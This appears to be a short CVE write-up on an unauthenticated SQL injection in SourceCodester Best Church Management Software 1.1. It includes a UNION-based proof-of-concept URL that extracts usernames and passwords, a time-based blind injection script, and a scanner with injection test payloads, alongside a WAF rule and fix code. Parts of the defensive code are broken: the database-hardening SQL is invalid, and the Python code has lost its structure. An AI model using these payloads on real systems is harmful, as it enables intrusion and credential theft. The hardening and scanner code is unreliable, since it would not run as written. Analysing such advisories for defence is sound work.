How CVE-2025-1200 Works
The vulnerability exists in the `/admin/app/slider_crud.php` file of SourceCodester Best Church Management Software 1.1. The `del_id` parameter is improperly sanitized before being used in SQL queries, allowing attackers to inject malicious SQL commands. When crafted SQL payloads are passed through the `del_id` parameter, the application executes them directly on the database server. This enables unauthorized data access, modification, or deletion. The attack can be performed remotely without authentication due to insufficient input validation and missing prepared statements.
DailyCVE Form
Platform: SourceCodester
Version: 1.1
Vulnerability: SQL Injection
Severity: Critical
date: 04/30/2025
What Undercode Say:
-- Exploit PoC /admin/app/slider_crud.php?del_id=1' UNION SELECT 1,2,3,4,5,group_concat(username,0x3a,password),7,8 FROM users-- -
Automated Exploit Script
import requests
target = "http://target.com/admin/app/slider_crud.php"
payload = "1' AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)--"
response = requests.get(target, params={"del_id": payload})
if response.elapsed.total_seconds() >= 5:
print("Vulnerable to SQLi")
// Protection Code
$del_id = mysqli_real_escape_string($conn, $_GET['del_id']);
$stmt = $conn->prepare("DELETE FROM sliders WHERE id = ?");
$stmt->bind_param("i", $del_id);
$stmt->execute();
WAF Rule to Block Exploits SecRule ARGS:del_id "@detectSQLi" "id:1001,deny,status:403,msg:'SQLi Attempt'"
-- Database Hardening REVOKE ALL PRIVILEGES ON church_db. FROM 'webuser'@'%'; GRANT SELECT ONLY ON church_db. TO 'webuser'@'%';
Vulnerability Scanner def check_sqli(url): test_payloads = ["1'", "1 AND 1=1", "1 AND 1=2"] for payload in test_payloads: r = requests.get(url + "?del_id=" + payload) if "error in your SQL" in r.text: return True return False
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode
